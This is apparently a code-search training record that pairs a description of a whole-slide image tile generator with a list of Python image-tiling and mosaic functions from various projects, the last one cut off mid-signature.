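A minimal usage sketch for the generator above, assuming `wsi` is an OpenSlide handle and that `get_size_for_mag` and `highest_mag` are available from the same module; the slide path and output filenames are hypothetical. Note the protocol: the first yielded value is the (x_tiles, y_tiles) grid size, and every later value is a resized PIL tile.

import openslide

# Hypothetical whole-slide image path; any OpenSlide-readable file works.
wsi = openslide.OpenSlide("example_slide.svs")

# Request 256 px tiles at 10x magnification.
gen = tile_gen_at_mag(wsi, mag=10, tile_size=256)

# First yield is the tile grid size; the remaining yields are the tiles.
x_tiles, y_tiles = next(gen)
for i, tile in enumerate(gen):
    # read_region returns RGBA PIL images; convert before saving as PNG.
    tile.convert("RGB").save("tile_%05d.png" % i)

wsi.close()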
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def tile_slides(slides_filepaths, desired_tile_with, desired_overlap, desired_magnification):\n containing_folders = []\n for slide_filepath in slides_filepaths:\n containing_folders.append(tile_slide(slide_filepath, desired_tile_with, desired_overlap, desired_magnification))\n return containing_folders", "def dynamic_tiles(slide_name, small_tile_in_tile=False):\n np_img = slide.get_slide(slide_name)\n filt_np_img = filters.apply_image_filters(np_img)\n tile_summary = score_tiles(slide_name, filt_np_img, small_tile_in_tile)\n return tile_summary", "def make_tiles(input_path, save_path, dimension):\n for filename in os.listdir(input_path):\n if filename.endswith(\".png\"):\n image_path = input_path + filename\n\n width, height = Image.open(image_path).size\n\n # Ensures image is square.\n assert width == height\n # Ensures the image can be cut into the desired dimensions.\n assert width % dimension == 0\n n_tiles = (width / dimension) ** 2\n\n tiles = image_slicer.slice(image_path, n_tiles, save=False)\n image_slicer.save_tiles(\n tiles, directory=save_path, prefix=filename[0:2], format=\"png\"\n )", "def image_tiles(bqsession, image_service_url, tile_size=64):\n dims = bqsession.fetchxml(image_service_url, dims='')\n x = int(dims.xpath('//tag[@name=\"image_num_x\"]')[0].attrib[ 'value'])\n y = int(dims.xpath('//tag[@name=\"image_num_y\"]')[0].attrib[ 'value'])\n \n for ix in range(int(x/tile_size)-1):\n for iy in range(int(y/tile_size)-1):\n yield bqsession.c.prepare_url(image_service_url, tile='0,%s,%s,%s' % (str(ix), str(iy), str(tile_size)))", "def montage(images, w_sub, h_sub, step):\n target = Image.new('RGB', (w_sub*step, h_sub*step))\n left = 0\n right = w_sub\n for i in range(len(images)):\n top=(i//step)*h_sub\n target.paste(images[i], (left, top, right, top+h_sub))\n if(i//step < (i+1)//step):#Check if this row is done\n left = 0#Reset the position in a row\n right = w_sub\n else: #Next picture\n left += w_sub\n right += w_sub\n quality_value = 100\n return target", "def image_range_to_tiles(start_ind, end_ind, display=False, save_summary=True, save_data=True, save_top_tiles=True):\n image_list = list()\n tile_summaries_dict = dict()\n for slide_name in range(start_ind, end_ind + 1):\n tile_summary = summary_and_tiles(slide_name, display, save_summary, save_data, save_top_tiles)\n image_list.append(slide_name)\n tile_summaries_dict[slide_name] = tile_summary\n return image_list, tile_summaries_dict", "def build_tiles(img,tilefile,tilesize,options=[]):\n\tlevels=ceil(log(max(img.get_xsize(),img.get_ysize())/tilesize)/log(2.0))\n\t\n\ttf=file(tilefile,\"w\")\n\t\n\ttile_dict={}\n\tpos=0\n\timg2=img.copy()\n\txs,ys=img2.get_xsize(),img2.get_ysize()\n\tfor l in range(int(levels)):\n\t\trmin=img2.get_attr(\"mean\")-img2.get_attr(\"sigma\")*3.0\n\t\trmax=img2.get_attr(\"mean\")+img2.get_attr(\"sigma\")*3.0\n\t\tfor x in range(0,img2.get_xsize(),tilesize):\n\t\t\tfor y in range(0,img2.get_ysize(),tilesize):\n\t\t\t\ti=img2.get_clip(Region(x,y,tilesize,tilesize))\n\t\t\t\ti.set_attr(\"render_min\",rmin)\n\t\t\t\ti.set_attr(\"render_max\",rmax)\n\t\t\t\ti.set_attr(\"jpeg_quality\",70)\n\t\t\t\tfsp=\"tmpimg.%d.%03d.%03d.jpg\"%(l,x/tilesize,y/tilesize)\n\t\t\t\ti.write_image(fsp)\n\t\t\t\tsz=os.stat(fsp).st_size\n\t\t\t\ttile_dict[(l,x/tilesize,y/tilesize)]=(pos,sz)\n\t\t\t\tpos+=sz\n\t\timg2.process_inplace(\"math.meanshrink\",{\"n\":2})\n\t\n\t# This will produce 2 power spectrum images in the tile file\n\t# with scale factors -1 and -2\n\tif \"pspec\" in options 
:\n\t\tnx,ny=img.get_xsize()/512,img.get_ysize()/512\n\t\ta=EMData()\n\t\ta.set_size(512,512)\n\t\tif (ny>2 and nx>2) :\n\t\t\tfor y in range(1,ny-1):\n\t\t\t\tfor x in range(1,nx-1):\n\t\t\t\t\tc=img.get_clip(Region(x*512,y*512,512,512))\n\t\t\t\t\tc.process_inplace(\"normalize\")\n\t\t\t\t\tc.process_inplace(\"math.realtofft\")\n\t\t\t\t\tc.process_inplace(\"math.squared\")\n\t\t\t\t\ta+=c\n\t\t\ta.set_value_at(256,256,0,.01)\n\t\t\ta-=a.get_attr(\"minimum\")-a.get_attr(\"sigma\")*.01\n\t\t\ta.process_inplace(\"math.log\")\n\t\t\ta-=a.get_attr(\"minimum\")\n\t\t\ta.set_attr(\"render_min\",a.get_attr(\"minimum\")-a.get_attr(\"sigma\")*.1)\n\t\t\ta.set_attr(\"render_max\",a.get_attr(\"mean\")+a.get_attr(\"sigma\")*4.0)\n\t\t\ta.set_attr(\"jepg_quality\",80)\n\t\t\ta.write_image(\"/tmp/tmpimg.mrc\")\n\t\t\tfsp=\"tmpimg.jpg\"\n\t\t\ta.write_image(fsp)\n\t\t\tsz=os.stat(fsp).st_size\n\t\t\ttile_dict[(-1,0,0)]=(pos,sz)\n\t\t\tpos+=sz\n\t\n#\t\ttry:\n\t\t\timport matplotlib\n\t\t\tmatplotlib.use('Agg')\n\t\t\timport pylab\n\t\t\tmanager = pylab.get_current_fig_manager()\n\t\t\tapix=options[\"pspec\"]\n\t\t\tdx=1.0/(2.0*apix*256.0)\n\t\t\tx=pylab.arange(dx,dx*255.9,dx)\n\t\t\ty=a.calc_radial_dist(255,1,1,0)\t# radial power spectrum (log)\n\t\t\tpylab.figure(figsize=(8,6),dpi=96)\n\t\t\tpylab.axes([.08,.08,.9,.9], axisbg='w')\n\t\t\tpylab.plot(x,y)\n\t\t\tpylab.axis([0,dx*256,min(y),max(y)])\n\t\t\tpylab.xlabel(\"Spatial Freq. (1/A)\")\n\t\t\tpylab.ylabel(\"Log Intensity (10^x)\")\n#\t\t\tprint y\n\t\t\t\n\t\t\tfsp=\"tmpimg2.png\"\n\t\t\tpylab.savefig(fsp,dpi=96)\n\t\t\tsz=os.stat(fsp).st_size\n\t\t\ttile_dict[(-2,0,0)]=(pos,sz)\n\t\t\tpos+=sz\n\n#\t\texcept:\n#\t\t\tprint \"Unable to generate plot (need matplotlib)\"\n\t\t\t\n\t\n\tpickle.dump(tile_dict,tf)\n\t\n\tfor l in range(int(levels)):\n\t\tfor x in range(0,xs,tilesize):\n\t\t\tfor y in range(0,ys,tilesize):\n\t\t\t\tfsp=\"tmpimg.%d.%03d.%03d.jpg\"%(l,x/tilesize,y/tilesize)\n\t\t\t\ta=file(fsp,\"r\")\n\t\t\t\tb=a.read()\n\t\t\t\ta.close()\n\t\t\t\ttf.write(b)\n\t\t\t\tos.remove(fsp)\n\t\txs/=2\n\t\tys/=2\n\t\n\tif \"pspec\" in options :\n\t\tfor fsp in [\"tmpimg.jpg\",\"tmpimg2.png\"] :\n\t\t\ta=file(fsp,\"r\")\n\t\t\tb=a.read()\n\t\t\ta.close()\n\t\t\ttf.write(b)\n#\t\t\tos.remove(fsp)\n\t\n\ttf.close()", "def tile_images(image_stack):\n assert len(image_stack.shape) == 4\n image_list = [image_stack[i, :, :, :] for i in range(image_stack.shape[0])]\n tiled_images = np.concatenate(image_list, axis=1)\n return tiled_images", "def slice_to_tiles(self, tile_raw_size=None, show_info=\"\"):\n if not tile_raw_size: tile_raw_size = self.tile_raw_size\n tile_raw_w,tile_raw_h = tile_raw_size\n tile_w,tile_h = round(tile_raw_w),round(tile_raw_h)\n\n if show_info:\n print(f\" ==Slicing {show_info} Tiles==\")\n print(f' Tile raw size: {tile_raw_size[0]} x {tile_raw_size[1]} px\\n')\n\n #process into list of image objects\n tiles = []\n true_x, true_y = (0,0)\n with Image.open(self.path) as img_obj:\n w,h = img_obj.size\n for row in range(0,h-tile_h,tile_h):\n tiles_row = []\n y = round(true_y)\n for col in range(0,w-tile_w,tile_w):\n x = round(true_x)\n im_crop = img_obj.crop((x,y,x+tile_w,y+tile_h))\n tiles_row.append(im_crop)\n true_x += tile_raw_w\n tiles.append(tiles_row)\n true_y += tile_raw_h\n true_x = 0\n\n return tiles", "def multiprocess_filtered_images_to_tiles(display=False, save_summary=True, save_data=True, save_top_tiles=True,\n html=False, image_list=None):\n timer = Time()\n print(\"Generating tile summaries (multiprocess)\\n\")\n\n 
if save_summary and not os.path.exists(slide.TILE_SUMMARY_DIR):\n os.makedirs(slide.TILE_SUMMARY_DIR)\n\n # how many processes to use\n num_processes = min(multiprocessing.cpu_count(),5)#multiprocessing.cpu_count()\n pool = multiprocessing.Pool(num_processes)\n\n if image_list is not None:\n num_train_images = len(image_list)\n\n if num_processes > num_train_images:\n num_processes = num_train_images\n images_per_process = num_train_images / num_processes\n\n print(\"Number of processes: \" + str(num_processes))\n print(\"Number of training images: \" + str(num_train_images))\n\n tasks = []\n for num_process in range(1, num_processes + 1):\n start_index = (num_process - 1) * images_per_process + 1\n end_index = num_process * images_per_process\n start_index = int(start_index)\n end_index = int(end_index)\n if image_list is not None:\n sublist = image_list[start_index - 1:end_index]\n tasks.append((sublist, display, save_summary, save_data, save_top_tiles))\n print(\"Task #\" + str(num_process) + \": Process slides \" + str(sublist))\n else:\n tasks.append((start_index, end_index, display, save_summary, save_data, save_top_tiles))\n if start_index == end_index:\n print(\"Task #\" + str(num_process) + \": Process slide \" + str(start_index))\n else:\n print(\"Task #\" + str(num_process) + \": Process slides \" + str(start_index) + \" to \" + str(end_index))\n\n # start tasks\n results = []\n for t in tasks:\n if image_list is not None:\n results.append(pool.apply_async(image_list_to_tiles, t))\n else:\n results.append(pool.apply_async(image_range_to_tiles, t))\n\n slide_names = list()\n tile_summaries_dict = dict()\n for result in results:\n image_nums, tile_summaries = result.get()\n slide_names.extend(image_nums)\n tile_summaries_dict.update(tile_summaries)\n print(\"Done tiling slides: %s\" % image_nums)\n\n if html:\n generate_tiled_html_result(slide_names, tile_summaries_dict, save_data)\n\n print(\"Time to generate tile previews (multiprocess): %s\\n\" % str(timer.elapsed()))", "def _tile_images(imgs, tile_shape, concatenated_image, margin_color=None):\n x_num, y_num = tile_shape\n one_width = imgs[0].shape[1]\n one_height = imgs[0].shape[0]\n if concatenated_image is None:\n concatenated_image = np.zeros((one_height * y_num, one_width * x_num, 3),\n dtype=np.uint8)\n if margin_color is not None:\n concatenated_image[:, :] = margin_color\n for y in range(y_num):\n for x in range(x_num):\n i = x + y * x_num\n if i >= len(imgs):\n pass\n else:\n concatenated_image[y*one_height:(y+1)*one_height,x*one_width:(x+1)*one_width,] = imgs[i]\n return concatenated_image", "def main():\n\tparser = construct_parser()\n\targs = parser.parse_args()\n\ttiles = slice(args.image, args.num_tiles, save=False)\n\tsave_tiles(tiles, prefix=get_basename(args.image), directory=args.dir,\n\t\t format=args.format)", "def generate_tiles(self):\n if self.children:\n for child in self.children:\n child.generate_tiles()\n print \"Generating tile for %s using child tiles\" % self.bbox\n self.generate_tile_from_child_tiles()\n else:\n print \"Generating tile for %s using source data\" % self.bbox\n self.generate_tile_from_source()", "def readTiles(self):\n TileImage = Image.open(self.Filename).convert(\"RGB\")\n TileIW, TileIH = TileImage.size\n TilesetW, TilesetH = TileIW // self.TileWidth, TileIH // self.TileHeight\n\n for y in range(TilesetH):\n for x in range(TilesetW):\n box = self.TileWidth * x, self.TileHeight * y, self.TileWidth * (x+1), self.TileHeight * (y+1)\n tile = TileImage.crop(box)\n 
self.List.append(tile)\n\n str = tile.tostring()\n if not str in self.TileDict:\n #print(\"add tile: \", str)\n self.TileDict[str] = len(self.List) - 1\n print(\"tile count: {}, unique count: {}\".format(len(self.List),len(self.TileDict.values())))", "def create_tiles(self, zoom):\n # Compute the tile x-y-z index range for the rasterlayer for this zoomlevel\n bbox = self.rasterlayer.extent()\n indexrange = tiler.tile_index_range(bbox, zoom)\n\n # Compute scale of tiles for this zoomlevel\n tilescale = tiler.tile_scale(zoom)\n\n # Count the number of tiles that are required to cover the raster at this zoomlevel\n nr_of_tiles = (indexrange[2] - indexrange[0] + 1) * (indexrange[3] - indexrange[1] + 1)\n\n # Create destination raster file\n self.log('Snapping dataset to zoom level {0}'.format(zoom))\n\n bounds = tiler.tile_bounds(indexrange[0], indexrange[1], zoom)\n sizex = (indexrange[2] - indexrange[0] + 1) * self.tilesize\n sizey = (indexrange[3] - indexrange[1] + 1) * self.tilesize\n dest_file = os.path.join(self.tmpdir, 'djangowarpedraster' + str(zoom) + '.tif')\n\n snapped_dataset = self.dataset.warp({\n 'name': dest_file,\n 'origin': [bounds[0], bounds[3]],\n 'scale': [tilescale, -tilescale],\n 'width': sizex,\n 'height': sizey,\n })\n\n self.log('Creating {0} tiles for zoom {1}.'.format(nr_of_tiles, zoom))\n\n counter = 0\n for tilex in range(indexrange[0], indexrange[2] + 1):\n for tiley in range(indexrange[1], indexrange[3] + 1):\n # Log progress\n counter += 1\n if counter % 250 == 0:\n self.log('{0} tiles created at zoom {1}'.format(counter, zoom))\n\n # Calculate raster tile origin\n bounds = tiler.tile_bounds(tilex, tiley, zoom)\n\n # Construct band data arrays\n pixeloffset = (\n (tilex - indexrange[0]) * self.tilesize,\n (tiley - indexrange[1]) * self.tilesize\n )\n\n band_data = [\n {\n 'data': band.data(offset=pixeloffset, size=(self.tilesize, self.tilesize)),\n 'nodata_value': band.nodata_value\n } for band in snapped_dataset.bands\n ]\n\n # Add tile data to histogram\n if zoom == self.max_zoom:\n self.push_histogram(band_data)\n\n # Warp source raster into this tile (in memory)\n dest = GDALRaster({\n 'width': self.tilesize,\n 'height': self.tilesize,\n 'origin': [bounds[0], bounds[3]],\n 'scale': [tilescale, -tilescale],\n 'srid': WEB_MERCATOR_SRID,\n 'datatype': snapped_dataset.bands[0].datatype(),\n 'bands': band_data,\n })\n\n # Store tile\n RasterTile.objects.create(\n rast=dest,\n rasterlayer=self.rasterlayer,\n tilex=tilex,\n tiley=tiley,\n tilez=zoom\n )\n\n # Store histogram data\n if zoom == self.max_zoom:\n bandmetas = RasterLayerBandMetadata.objects.filter(rasterlayer=self.rasterlayer)\n for bandmeta in bandmetas:\n bandmeta.hist_values = self.hist_values[bandmeta.band].tolist()\n bandmeta.save()\n\n # Remove snapped dataset\n self.log('Removing snapped dataset.', zoom=zoom)\n snapped_dataset = None\n os.remove(dest_file)", "def img_to_tiles(cls, tiff_path, region, res, tile, tile_date_path, img_format, mp):\n\n # Get metadata from original image\n metadata = TiffMetadata(tiff_path)\n\n WIDTH, HEIGHT = region.calculate_width_height(res)\n ultra_large = False\n if WIDTH * HEIGHT > 2 * Image.MAX_IMAGE_PIXELS:\n ultra_large = True\n\n # Use the following dictionary to get the coordinates of each tile\n geoTran_d = TileUtils.getGeoTransform(tiff_path)\n\n # Check for valid tiling dimensions\n if (tile.width > WIDTH or tile.height > HEIGHT):\n raise argparse.ArgumentTypeError(\"Tiling dimensions greater than image dimensions\")\n\n # Determine the number of tiles 
per row and column\n if tile.handling == Handling.discard_incomplete_tiles:\n num_rows = (HEIGHT - tile.height * tile.overlap) // (tile.height * (1 - tile.overlap))\n num_cols = (WIDTH - tile.width * tile.overlap) // (tile.width * (1 - tile.overlap))\n else:\n num_rows = math.ceil((HEIGHT - tile.height * tile.overlap) / (tile.height * (1 - tile.overlap)))\n num_cols = math.ceil((WIDTH - tile.width * tile.overlap) / (tile.width * (1 - tile.overlap)))\n\n num_iterations = num_rows * num_cols\n \n # Find the pixel coordinate extents of each tile to be generated\n print(\"Gathering tiling information...\", end=\"\", flush=True)\n if mp:\n with Pool(processes=NUM_CORES) as pool:\n args = zip(repeat((metadata, tile, WIDTH, HEIGHT, geoTran_d, tile_date_path, num_rows, num_cols)), list(range(num_iterations)))\n pixel_coords = pool.map(getTilingSplitCoordsMP, args)\n else:\n pixel_coords = []\n for index in range(num_iterations):\n pixel_coords.append(getTilingSplitCoordsTuple(metadata,tile, WIDTH, HEIGHT, geoTran_d, tile_date_path, num_rows, num_cols, index))\n print(\"done!\")\n\n if mp:\n print(\"Generating {} tiles using {} processes...\".format(len(pixel_coords), NUM_CORES), flush=True)\n else:\n print(\"Generating {} tiles sequentially...\".format(len(pixel_coords)), flush=True)\n\n if ultra_large: \n # Create the intermediate tiles\n inter_dir, img_width, img_height = TileUtils.img_to_intermediate_images(tiff_path, tile, WIDTH, HEIGHT, metadata.date, img_format)\n\n # Add each coordinate to its proper list\n intermediate_files = [f for f in os.listdir(inter_dir) if f.endswith(img_format)]\n\n # Get the tiling information for all intermediate tiles\n intermediate_info = TileUtils.getIntermediateTilingInfo(tile, pixel_coords, WIDTH, HEIGHT, img_width, img_height, intermediate_files)\n\n # Tile the complete images\n print(\"\\tTiling from complete images\")\n for single_inter_imgs in tqdm(intermediate_info[0]):\n filename = single_inter_imgs[0][0]\n inter_metadata = IntermediateMetadata(filename)\n\n img_path = os.path.join(inter_dir, filename)\n src = Image.open(img_path)\n img_arr = np.array(src)\n\n if mp:\n # Create a shared array\n X_shape = img_arr.shape\n X = RawArray('B', X_shape[0] * X_shape[1] * X_shape[2])\n\n # Wrap shared array as numpy array\n X_np = np.frombuffer(X, dtype='uint8').reshape(X_shape)\n\n # Copy image to the shared array\n np.copyto(X_np, img_arr)\n \n # Use multiprocessing to tile the numpy array\n with Pool(processes=NUM_CORES, initializer=init_worker, initargs=(X, X_shape, None, None)) as pool:\n multi = [pool.apply_async(TileUtils.generate_tile, args=(tile, WIDTH, HEIGHT, x, y, done_x, done_y, path, img_format,), kwds={\"inter_x\":(x - inter_metadata.start_x), \"inter_y\":(y - inter_metadata.start_y)}) for (filename, x, y, done_x, done_y, path) in single_inter_imgs]\n f = [p.get() for p in multi]\n pool.close()\n pool.join()\n else: \n for filename, x, y, done_x, done_y, path in single_inter_imgs:\n TileUtils.generate_tile(tile, WIDTH, HEIGHT, x, y, done_x, done_y, path, img_format, inter_x=(x - inter_metadata.start_x), inter_y=(y - inter_metadata.start_y), img_arr=img_arr)\n\n # Close the image\n src.close()\n # Tile in between two images\n print(\"\\tTiling between two images\")\n if mp:\n with Pool(processes=NUM_CORES) as pool:\n args = zip(repeat((tile.width, tile.height, inter_dir, img_format)), intermediate_info[1])\n result = list(tqdm(pool.imap(processDoublesMP, args), total=len(intermediate_info[1])))\n else:\n for double_inter_imgs in 
tqdm(intermediate_info[1]):\n processDoublesTuple(tile.width, tile.height, inter_dir, img_format, double_inter_imgs)\n \n # Tile in between four images\n print(\"\\tTiling between four images\")\n if mp:\n # Use half as many processes as cores to ensure not running out of available mem and getting stuck\n with Pool(processes=(NUM_CORES // 2)) as pool:\n args = zip(repeat((tile.width, tile.height, inter_dir, img_format)), intermediate_info[2])\n result = list(tqdm(pool.imap(processQuadsMP, args), total=len(intermediate_info[2])))\n else:\n for quad_inter_imgs in tqdm(intermediate_info[2]):\n processQuadsTuple(tile.width, tile.height, inter_dir, img_format, quad_inter_imgs)\n shutil.rmtree(inter_dir)\n else: \n # Open image as a numpy array in order to tile from the array\n src = Image.open(tiff_path)\n img_arr = np.array(src)\n\n if mp:\n # Create a shared array\n X_shape = img_arr.shape\n X = RawArray('B', X_shape[0] * X_shape[1] * X_shape[2])\n\n # Wrap shared array as numpy array\n X_np = np.frombuffer(X, dtype='uint8').reshape(X_shape)\n\n # Copy image to the shared array\n np.copyto(X_np, img_arr)\n\n # Use multiprocessing to tile the numpy array\n with Pool(processes=NUM_CORES, initializer=init_worker, initargs=(X, X_shape, None, None)) as pool:\n multi = [pool.apply_async(TileUtils.generate_tile, args=(tile, WIDTH, HEIGHT, x, y, done_x, done_y, path, img_format)) for (x, y, done_x, done_y, path) in pixel_coords]\n f = [p.get() for p in tqdm(multi)]\n pool.close()\n pool.join()\n else:\n for x, y, done_x, done_y, path in tqdm(pixel_coords):\n TileUtils.generate_tile(tile, WIDTH, HEIGHT, x, y, done_x, done_y, path, img_format, img_arr=img_arr)\n \n # Close the image\n src.close()\n print(\"done!\")", "def stich(data, title=None):\n # Get name, list of tiles, width and height\n name = data[\"levels\"][0][\"name\"] \n tiles = data[\"levels\"][0][\"tiles\"]\n width = data[\"levels\"][0][\"width\"]\n height = data[\"levels\"][0][\"height\"]\n\n # Create the directory to place all the downloaded tiles in\n if title: #if title provided, name directory based on that\n dirname = title\n else: #if title not provided, generate a name\n dirname = name + str(width) + str(height)\n os.makedirs(dirname, exist_ok=True)\n os.chdir(dirname)\n\n #Create the empty image based on dimensions\n result = Image.new('RGB', (width, height))\n tile_size = None \n\n # actually get the tiles\n for i in tiles:\n image = get_tile(i['url']) #download image\n if not tile_size:\n tile_size = image.size[0] # on the first tile get the image size\n result.paste(im=image, box=(i['x'] * tile_size, i['y'] * tile_size)) # each tile has a number which isn't\n # it's cooridnate in pixels but it's order. \n # To get pixel coordinate just multiply by the size of each tile\n result.save('final.jpeg') # save file in directory\n os.chdir(os.path.join( os.path.dirname( __file__ ), '..' 
)) # then navigate back up to the base directory", "def load_image_parts(self, filename, margin, spacing, tile_width, tile_height, colorkey=None): #-> [images]\n raise NotImplementedError(u'This should be implemented in a inherited class')", "def load_image_parts(self, filename, margin, spacing, tile_width, tile_height, colorkey=None): #-> [images]\n raise NotImplementedError(u'This should be implemented in a inherited class')", "def _generate_images(self, trace):\n images = []\n colors = []\n colors_by_shape = {}\n for board in trace:\n width = int(round((float(board.shape[1]) / board.shape[0]) * self._height))\n cellsize = width / board.shape[1] # cell size\n img = np.zeros((self._height, width, 3), dtype=np.uint8)\n\n tiles = {} # map from integer rep. of the tile to a shape\n for y in range(board.shape[0]):\n for x in range(board.shape[1]):\n cell = board[y,x]\n if cell not in tiles:\n tiles[cell] = (x, y, 1, 1) # x, y, w, h\n else:\n cur_x, cur_y, cur_w, cur_h = tiles[cell]\n if x >= cur_x + cur_w:\n cur_w = (x-cur_x) + 1\n if y >= cur_y + cur_h:\n cur_h = (y-cur_y) + 1\n tiles[cell] = (cur_x, cur_y, cur_w, cur_h)\n\n # Colors\n if len(colors_by_shape) == 0:\n for tid in tiles:\n shape = (tiles[tid][2], tiles[tid][3])\n if shape not in colors_by_shape:\n colors_by_shape[shape] = hex_to_rgb(random_unique_color(colors))\n colors.append(colors_by_shape[shape])\n\n for tid in tiles:\n x, y, w, h = tiles[tid]\n shape = (w,h)\n empty = board[y,x] == 0\n x, y, w, h = x*cellsize, y*cellsize, w*cellsize, h*cellsize\n # Draw a filled rectangle without color\n if not empty:\n cv2.rectangle(img, (x, y), (x+w, y+h), colors_by_shape[shape],-1)\n else:\n cv2.rectangle(img, (x, y), (x+w, y+h), [0,0,0], -1) #, 8)-\n # Draw a boundary\n cv2.rectangle(img, (x, y), (x+w, y+h), (0, 0, 0), 2, 8)\n \n images.append(img)\n return images", "def get_tiles():\n\t\t\n\tcursor = get_cursor()\n\t\n\tcursor.execute(\"SELECT * FROM fitmeimages ORDER BY shade ASC, id ASC\")\n\treturn cursor.fetchall();", "def get_tiles(self) -> list:\n n_rows = self.mosaic_dimensions[0]\n n_columns = self.mosaic_dimensions[1]\n return [\n self.get_tile(i_row, i_column)\n for i_row in range(n_rows)\n for i_column in range(n_columns)\n ]", "def tile_images(img, img_size=32, rows=4, cols=4, spacing=1):\n images = np.ones([3, rows * (img_size + spacing) - spacing, cols * (img_size + spacing)], dtype=np.float32)\n coords = [(i, j) for i in range(rows) for j in range(cols)]\n\n for (i, j), image in zip(coords, img):\n x = i * (img_size + spacing)\n y = j * (img_size + spacing)\n images[:, x: x+img_size, y:y+img_size] = image\n\n return images", "def build_filler_images(self):", "def generate_base_tiles(self):\n\n if not self.options.quiet:\n print(\"Generating Base Tiles:\")\n\n if self.options.verbose:\n print('')\n print(\"Tiles generated from the max zoom level:\")\n print(\"----------------------------------------\")\n print('')\n\n # Set the bounds\n tminx, tminy, tmaxx, tmaxy = self.tminmax[self.tmaxz]\n\n ds = self.warped_input_dataset\n tilebands = self.dataBandsCount + 1\n querysize = self.querysize\n\n if self.options.verbose:\n print(\"dataBandsCount: \", self.dataBandsCount)\n print(\"tilebands: \", tilebands)\n\n tcount = (1+abs(tmaxx-tminx)) * (1+abs(tmaxy-tminy))\n ti = 0\n\n tile_details = []\n\n tz = self.tmaxz\n for ty in range(tmaxy, tminy-1, -1):\n for tx in range(tminx, tmaxx+1):\n\n ti += 1\n ytile = GDAL2Tiles.getYtile(ty, tz, self.options)\n tilefilename = os.path.join(\n self.output_folder, str(tz), 
'{0:04d}'.format(tx) + \"_\" + '{0:04d}'.format(ytile) + \".\" + self.tileext)\n if self.options.verbose:\n print(ti, '/', tcount, tilefilename)\n\n if self.options.resume and os.path.exists(tilefilename):\n if self.options.verbose:\n print(\"Tile generation skipped because of --resume\")\n continue\n\n # Create directories for the tile\n if not os.path.exists(os.path.dirname(tilefilename)):\n os.makedirs(os.path.dirname(tilefilename))\n\n if self.options.profile == 'mercator':\n # Tile bounds in EPSG:3857\n b = self.mercator.TileBounds(tx, ty, tz)\n elif self.options.profile == 'geodetic':\n b = self.geodetic.TileBounds(tx, ty, tz)\n\n # Don't scale up by nearest neighbour, better change the querysize\n # to the native resolution (and return smaller query tile) for scaling\n\n if self.options.profile in ('mercator', 'geodetic'):\n rb, wb = self.geo_query(ds, b[0], b[3], b[2], b[1])\n\n # Pixel size in the raster covering query geo extent\n nativesize = wb[0] + wb[2]\n if self.options.verbose:\n print(\"\\tNative Extent (querysize\", nativesize, \"): \", rb, wb)\n\n # Tile bounds in raster coordinates for ReadRaster query\n rb, wb = self.geo_query(ds, b[0], b[3], b[2], b[1], querysize=querysize)\n\n rx, ry, rxsize, rysize = rb\n wx, wy, wxsize, wysize = wb\n\n else: # 'raster' profile:\n\n tsize = int(self.tsize[tz]) # tilesize in raster coordinates for actual zoom\n xsize = self.warped_input_dataset.RasterXSize # size of the raster in pixels\n ysize = self.warped_input_dataset.RasterYSize\n if tz >= self.nativezoom:\n querysize = self.tilesize\n\n rx = (tx) * tsize\n rxsize = 0\n if tx == tmaxx:\n rxsize = xsize % tsize\n if rxsize == 0:\n rxsize = tsize\n\n rysize = 0\n if ty == tmaxy:\n rysize = ysize % tsize\n if rysize == 0:\n rysize = tsize\n ry = ysize - (ty * tsize) - rysize\n\n wx, wy = 0, 0\n wxsize = int(rxsize/float(tsize) * self.tilesize)\n wysize = int(rysize/float(tsize) * self.tilesize)\n if wysize != self.tilesize:\n wy = self.tilesize - wysize\n\n # Read the source raster if anything is going inside the tile as per the computed\n # geo_query\n tile_details.append(\n TileDetail(\n tx=tx, ty=ytile, tz=tz, rx=rx, ry=ry, rxsize=rxsize, rysize=rysize, wx=wx,\n wy=wy, wxsize=wxsize, wysize=wysize, querysize=querysize,\n )\n )\n\n conf = TileJobInfo(\n src_file=self.tmp_vrt_filename,\n nb_data_bands=self.dataBandsCount,\n output_file_path=self.output_folder,\n tile_extension=self.tileext,\n tile_driver=self.tiledriver,\n tile_size=self.tilesize,\n kml=self.kml,\n tminmax=self.tminmax,\n tminz=self.tminz,\n tmaxz=self.tmaxz,\n in_srs_wkt=self.in_srs_wkt,\n out_geo_trans=self.out_gt,\n ominy=self.ominy,\n is_epsg_4326=self.isepsg4326,\n options=self.options,\n )\n\n return conf, tile_details", "def generate_overlay_images(self, overlay_name, x, y):\n for tile in range(1, self.config.number_of_tiles + 1):\n for time in self.config.time_points:\n for depth in self.config.depth_points:\n desc = self.config.tile_description_generator(tile, time, depth)\n file_name = self._generate_overlay_file_name(self.well, overlay_name, desc)\n self._generate_overlay(file_name, overlay_name + '-' + self.well + '-' + desc, x, y)", "def iter_tiles(data_sampler, depth, merge=True):\n if merge is True:\n merge = _default_merge\n\n parents = defaultdict(dict)\n\n for node, c, increasing in iter_corners(max(depth, 1),\n bottom_only=merge):\n\n l, b = subsample(c[0], c[1], c[2], c[3], 256, increasing)\n img = data_sampler(l, b)\n\n for pth, img in _trickle_up(img, node, parents, merge, depth):\n yield 
pth, img", "def image_list_to_tiles(image_list, display=False, save_summary=True, save_data=True, save_top_tiles=True):\n tile_summaries_dict = dict()\n for slide_name in image_list:\n tile_summary = summary_and_tiles(slide_name, display, save_summary, save_data, save_top_tiles)\n tile_summaries_dict[slide_name] = tile_summary\n return image_list, tile_summaries_dict", "def open_images_in(directory):\n\n files = [\n filename\n for filename in os.listdir(directory)\n if \"_\" in filename and not filename.startswith(\"joined\")\n ]\n tiles = []\n if len(files) > 0:\n i = 0\n for file in files:\n pos = get_image_column_row(file)\n im = Image.open(os.path.join(directory, file))\n\n position_xy = [0, 0]\n count = 0\n for a, b in zip(pos, im.size):\n position_xy[count] = a * b\n count = count + 1\n tiles.append(\n Tile(\n image=im,\n position=pos,\n number=i + 1,\n coords=position_xy,\n filename=file,\n )\n )\n i = i + 1\n return tiles", "def gen_imgs(samples, batch_size, shuffle=False):\n \n num_samples = len(samples)\n print(num_samples)\n \n \n images = []\n \n for _, batch_sample in batch_samples.iterrows():\n \n with openslide.open_slide(batch_sample.slide_path) as slide:\n tiles = DeepZoomGenerator(slide, tile_size=224, overlap=0, limit_bounds=False)\n print(batch_sample.tile_loc[::], batch_sample.tile_loc[::-1])\n img = tiles.get_tile(tiles.level_count-1, batch_sample.tile_loc[::-1])\n \n \n images.append(np.array(img))\n\n X_train = np.array(images)\n \n yield X_train", "def make_random_tiles(sx=500, sy=500, sz=0, 